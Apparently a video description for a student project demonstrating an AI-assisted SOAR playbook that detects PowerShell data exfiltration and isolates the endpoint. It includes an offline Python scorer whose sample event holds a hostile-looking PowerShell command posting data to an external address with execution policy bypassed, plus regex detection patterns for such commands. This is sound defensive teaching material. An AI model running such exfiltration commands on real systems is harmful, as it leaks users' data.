AI-Powered SOAR | Data Exfiltration Playbook Demo (PowerShell.exe)
In this video, I demonstrate the Data Exfiltration stage of my Final Year Project, where an attacker abuses PowerShell.exe to transfer sensitive data from the system to a remote server.
The system detects this activity using LimaCharlie EDR, which monitors suspicious process execution and outbound network connections. The event is then analysed using an AI-based model (GPT-powered decision engine) to determine whether the behaviour indicates data exfiltration or normal activity.
Once the activity is confirmed as a threat, the playbook automatically executes a response: it isolates the endpoint to prevent further data leakage and sends an alert via Slack to notify the SOC team.
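As an added illustration of the decision and response stages described above (this is not code from the project or the video), the Python below runs the same flow offline: an EDR process-plus-network event is scored, a verdict is reached, and the response actions (endpoint isolation plus a Slack alert payload) are produced as data rather than live API calls. The event layout, sensor id, hostname and IP addresses are constructed, not LimaCharlie's real schema, and the GPT-powered decision engine is replaced by a transparent rule-based scorer so the example can run without network access.

```python
"""Offline stand-in for the exfiltration playbook: score an event, decide, respond.

Assumptions (not from the project): the event dict shape below is constructed to
resemble an EDR process+network event; the GPT decision engine is replaced by a
weighted rule scorer; isolation and Slack delivery are returned as payloads only.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample: PowerShell posting a large body to an external address.
SAMPLE_EVENT = {
    "sensor_id": "sensor-0001",   # constructed
    "hostname": "WS-DEMO-01",     # constructed
    "process": {
        "file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -NoProfile -ExecutionPolicy Bypass '
                        '-Command "Invoke-WebRequest -Method POST -Uri http://203.0.113.10/"',
        "parent": r"C:\Windows\System32\cmd.exe",
    },
    "network": {"dst_ip": "203.0.113.10", "dst_port": 80, "bytes_out": 5_242_880},
}

# Constructed benign sample: an admin listing a directory, tiny transfer to an internal host.
BENIGN_EVENT = {
    "sensor_id": "sensor-0002",
    "hostname": "WS-DEMO-02",
    "process": {
        "file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -Command "Get-ChildItem C:\\Logs"',
        "parent": r"C:\Windows\explorer.exe",
    },
    "network": {"dst_ip": "10.0.0.5", "dst_port": 445, "bytes_out": 1_200},
}

# Address ranges treated as internal; anything else counts as an external destination.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_external(ip_str: str) -> bool:
    ip = ipaddress.ip_address(ip_str)
    return not any(ip in net for net in INTERNAL_NETS)

def _cmd(event: dict) -> str:
    return event["process"]["command_line"]

# Each signal: (name, weight, predicate). Weights are illustrative, not tuned values.
SIGNALS = [
    ("powershell_process", 10, lambda e: e["process"]["file_path"].lower().endswith("powershell.exe")),
    ("upload_cmdlet", 25, lambda e: re.search(r"invoke-(webrequest|restmethod)", _cmd(e), re.I) is not None),
    ("http_post", 15, lambda e: re.search(r"-method\s+post", _cmd(e), re.I) is not None),
    ("policy_bypass", 10, lambda e: re.search(r"-executionpolicy\s+bypass|-encodedcommand|-enc\b", _cmd(e), re.I) is not None),
    ("external_destination", 20, lambda e: is_external(e["network"]["dst_ip"])),
    ("large_outbound_volume", 20, lambda e: e["network"]["bytes_out"] >= 1_048_576),
]

ISOLATE_THRESHOLD = 70  # score at or above this triggers automated containment

@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def is_exfiltration(self) -> bool:
        return self.score >= ISOLATE_THRESHOLD

def score_event(event: dict) -> Verdict:
    """Sum the weights of every signal that fires and record why."""
    verdict = Verdict()
    for name, weight, check in SIGNALS:
        if check(event):
            verdict.score += weight
            verdict.reasons.append(name)
    return verdict

def build_response(event: dict, verdict: Verdict) -> dict:
    """Return the playbook actions as data: an isolation request and a Slack message."""
    if not verdict.is_exfiltration:
        return {"actions": [], "slack": None}
    isolate = {"action": "isolate_endpoint", "sensor_id": event["sensor_id"]}
    slack = {  # Slack incoming-webhook style payload; only the 'text' field is used here
        "text": (f":rotating_light: Possible data exfiltration on {event['hostname']} "
                 f"(score {verdict.score}, signals: {', '.join(verdict.reasons)}). "
                 f"Endpoint {event['sensor_id']} isolated automatically.")
    }
    return {"actions": [isolate], "slack": slack}

if __name__ == "__main__":
    for ev in (SAMPLE_EVENT, BENIGN_EVENT):
        v = score_event(ev)
        print(ev["hostname"], v.score, v.reasons, build_response(ev, v))
```

The scorer is deliberately explainable: the `reasons` list travels with the verdict into the Slack message, so an analyst reviewing an automated isolation can see which signals drove it, which is the part an opaque model score alone does not give you.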
⚡Key Highlights:
Detection of PowerShell-based data exfiltration
AI-based behavioural analysis and risk scoring
Monitoring of outbound data transfer activity
Automated endpoint isolation to prevent data loss
Reduced MTTR with no manual intervention
🎯 This playbook is part of my project:
“Evaluating the Effectiveness of AI-Powered SOAR Workflows in Reducing Incident Response Time and Analyst Workload.”
💡 The goal is to detect and stop sensitive data leakage in real time, ensuring strong data protection through intelligent automation.
#CyberSecurity #SOAR #SOC #EDR #Automation #AI #DataExfiltration #PowerShell #ThreatDetection #BlueTeam #Limacharlie #tines #openai
@TinesHQ
@OpenAI
For more information contact: [email protected]